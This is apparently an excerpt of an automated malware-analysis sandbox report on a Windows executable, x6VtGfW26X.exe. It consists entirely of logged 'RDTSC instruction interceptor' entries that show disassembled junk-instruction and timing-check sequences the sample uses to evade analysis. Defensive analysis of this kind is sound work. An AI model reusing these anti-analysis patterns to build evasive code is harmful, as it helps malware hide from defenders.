            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FE319 second address: 9FE321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FD7DE second address: 9FD7E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FD7E2 second address: 9FD7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6C4CAD512h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FD7FC second address: 9FD80E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4EBA076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FA6C4EBA082h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FD80E second address: 9FD822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA6C4CAD506h 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FE85C second address: 9FE860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FE860 second address: 9FE877 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A08E03 second address: A08E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA6C4EBA076h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A08E0D second address: A08E11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A08E11 second address: A08E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA6C4EBA076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop edi 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e pop eax 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A08E30 second address: A08E3E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007FA6C4CAD506h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A08E3E second address: A08E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A07780 second address: A07784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A07A72 second address: A07A88 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA6C4EBA07Dh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A07DA8 second address: A07DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A08654 second address: A08670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA6C4EBA07Dh 0x0000000c jno 00007FA6C4EBA078h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A08670 second address: A08676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A08676 second address: A0867C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A08C53 second address: A08C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A0D66A second address: A0D677 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A0D677 second address: A0D67C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A0C4D9 second address: A0C4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA6C4EBA076h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A0C4E8 second address: A0C4EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A0C4EC second address: A0C4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C66A1 second address: 9C66F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD518h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1948h], edi 0x00000013 lea eax, dword ptr [ebp+124913E3h] 0x00000019 call 00007FA6C4CAD512h 0x0000001e xor ecx, 4D87FCA5h 0x00000024 pop edx 0x00000025 nop 0x00000026 js 00007FA6C4CAD514h 0x0000002c pushad 0x0000002d jns 00007FA6C4CAD506h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C6DBB second address: 9C6DC9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA6C4EBA076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C6DC9 second address: 9C6DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C6F11 second address: 9C6F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C712A second address: 9C7136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C7136 second address: 9C713A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C713A second address: 9C7140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C7140 second address: 9C7146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C7146 second address: 9C71AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD518h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FA6C4CAD508h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov cx, dx 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FA6C4CAD508h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 push eax 0x00000046 push ebx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A0C978 second address: A0C9B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA080h 0x00000007 pushad 0x00000008 jmp 00007FA6C4EBA085h 0x0000000d jmp 00007FA6C4EBA07Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A0CB00 second address: A0CB2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FA6C4CAD511h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 je 00007FA6C4CAD510h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A0CEE9 second address: A0CEF3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA6C4EBA07Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A0CEF3 second address: A0CF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FA6C4CAD50Ch 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A0CF09 second address: A0CF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A0EE1A second address: A0EE21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A0EE21 second address: A0EE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A13914 second address: A1391A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A1391A second address: A13939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4EBA089h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A13BDA second address: A13BFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD516h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FA6C4CAD506h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A174B7 second address: A174C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A174C1 second address: A174E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA6C4CAD519h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A174E5 second address: A17515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA6C4EBA082h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA6C4EBA088h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A1AFC0 second address: A1B020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA6C4CAD518h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FA6C4CAD513h 0x00000019 jbe 00007FA6C4CAD506h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 popad 0x00000022 jng 00007FA6C4CAD519h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A1B020 second address: A1B024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A1B024 second address: A1B028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A1B28F second address: A1B2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007FA6C4EBA081h 0x0000000b jmp 00007FA6C4EBA07Bh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A1B2A5 second address: A1B2CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push esi 0x00000007 jnl 00007FA6C4CAD506h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA6C4CAD517h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A2214D second address: A22157 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA6C4EBA076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A20B28 second address: A20B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A20B2C second address: A20B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A20B32 second address: A20B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A20E0F second address: A20E19 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA6C4EBA076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A20F5A second address: A20F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A20F60 second address: A20F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FA6C4EBA076h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A20F70 second address: A20F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A20F74 second address: A20F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A20F78 second address: A20F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FA6C4CAD506h 0x0000000e jmp 00007FA6C4CAD514h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A20F9A second address: A20F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A20F9E second address: A20FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FA6C4CAD515h 0x00000011 jmp 00007FA6C4CAD50Fh 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A20FBE second address: A20FC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A21145 second address: A21149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A21149 second address: A2115A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA07Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A2115A second address: A21163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A21163 second address: A21198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4EBA07Eh 0x00000009 jg 00007FA6C4EBA076h 0x0000000f popad 0x00000010 jmp 00007FA6C4EBA07Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA6C4EBA07Dh 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A21198 second address: A2119C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C739B second address: 9C73A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C73A1 second address: 9C73A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C73A5 second address: 9C7405 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FA6C4EBA078h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 pushad 0x00000026 or ax, 0AAEh 0x0000002b or edi, dword ptr [ebp+122D38CFh] 0x00000031 popad 0x00000032 push 00000004h 0x00000034 jns 00007FA6C4EBA084h 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FA6C4EBA081h 0x00000042 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C7405 second address: 9C742E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FA6C4CAD506h 0x00000009 jmp 00007FA6C4CAD517h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C742E second address: 9C7439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA6C4EBA076h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C7397 second address: 9C739B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A28282 second address: A28286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A28286 second address: A2828E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A2828E second address: A28294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A28294 second address: A282DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FA6C4CAD519h 0x0000000f jo 00007FA6C4CAD506h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FA6C4CAD512h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FA6C4CAD50Ah 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A282DE second address: A282E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A282E2 second address: A282E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A282E8 second address: A282F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA6C4EBA07Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A28425 second address: A2844F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4CAD511h 0x00000009 jmp 00007FA6C4CAD515h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A2844F second address: A28495 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA6C4EBA076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FA6C4EBA078h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 jl 00007FA6C4EBA076h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FA6C4EBA084h 0x00000026 jmp 00007FA6C4EBA07Fh 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A288CE second address: A288F5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA6C4CAD50Eh 0x00000008 jc 00007FA6C4CAD50Ch 0x0000000e jo 00007FA6C4CAD506h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FA6C4CAD506h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A28E8D second address: A28EAD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6C4EBA07Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA6C4EBA080h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A296F8 second address: A296FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A296FC second address: A29700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A29700 second address: A29712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FA6C4CAD506h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
